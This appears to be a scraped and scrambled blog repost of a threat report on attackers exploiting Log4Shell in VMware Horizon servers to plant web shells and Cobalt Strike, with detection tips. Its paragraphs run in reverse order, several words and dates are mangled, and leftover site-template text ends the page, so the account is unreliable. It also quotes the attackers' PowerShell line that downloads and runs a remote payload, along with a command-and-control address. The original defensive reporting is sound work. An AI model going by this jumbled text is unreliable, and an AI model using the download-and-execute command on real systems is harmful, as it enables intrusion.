![]() Manually inspect/assess the files within %ProgramFiles%\VMware\VMware View\Server\appblastgateway\ for the presence of the child_process string as pictured.Run VMware's Horizon Mitigation tool to report whether there is a vulnerable Log4J library or child_process based web shell present under the install location with the following command: Horizon_Windows_Log4j_Mitigation.bat /verbose.We strongly suggest you perform the following actions: ![]() Detection Tipsįor those of you just learning about the mass exploitation of VMware Horizon servers and the installation of backdoor web shells, you should seriously consider the possibility that your server is compromised if it was unpatched and internet-facing. This conclusion is largely based on analysis of the PowerShell payload's parent process where web shell abuse spawns from node.exe while exploitation of Log4Shell in Horizon spawns from ws_tomcatservice.exe. Initial Access Sourceĭespite the prior mass exploitation of VMware Horizon to deliver web shells, our data suggests today's Cobalt Strike deployments were exploitation of Horizon itself and not the abuse of web shells. This new EDR capability is based on an acquisition we made in early 2021 and allows us to proactively detect and respond to non-persistent malicious behavior by giving us the ability to collect detailed information about processes. Iex ((New-Object ).DownloadString('116:8080/drv'))Īt 1938 ET, we started deploying Huntress' soon-to-be-released Process Insights agent to all of the VMware Horizon servers we protect. These two hosts were from two different partners, but the commonalty was VMware Horizon server.Īdditional security researchers including TheDFIRReport and Red Canary reported similar behavior around the same time-confirming a PowerShell based downloader executed a Cobalt Strike payload that was configured to call back to 185.112.83116 for command and control. At 1518 ET another Managed Antivirus detection for Cobalt Strike on another host was identified. On January 14 at 1458 ET, an unrelated Managed Antivirus detection (Microsoft Defender) tipped our ThreatOps team to a Cobalt Strike implant. Our analysis of the web shells on these 18 compromised systems established a timeline that started on Decemand continued until December 29, 2021. It's important to note that ~34% of the 180 Horizon servers (62) we analyzed were unpatched and internet facing at the time of this publication. According to Shodan, ~25,000 Horizon servers are currently internet accessible worldwide.īased on Huntress' dataset of 180 Horizon servers, we've validated NHS' intel and discovered 10% of these systems (18) had been backdoored with a modified absg-worker.js web shell. These web shells allow unauthenticated attackers to remotely execute commands on your server as NT AUTHORITY\SYSTEM (root privileges). On January 5th, the UK's National Health Service (NHS) alerted that hackers were actively targeting Log4Shell vulnerabilities in VMware Horizon servers in an effort to establish persistent access via web shells.
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |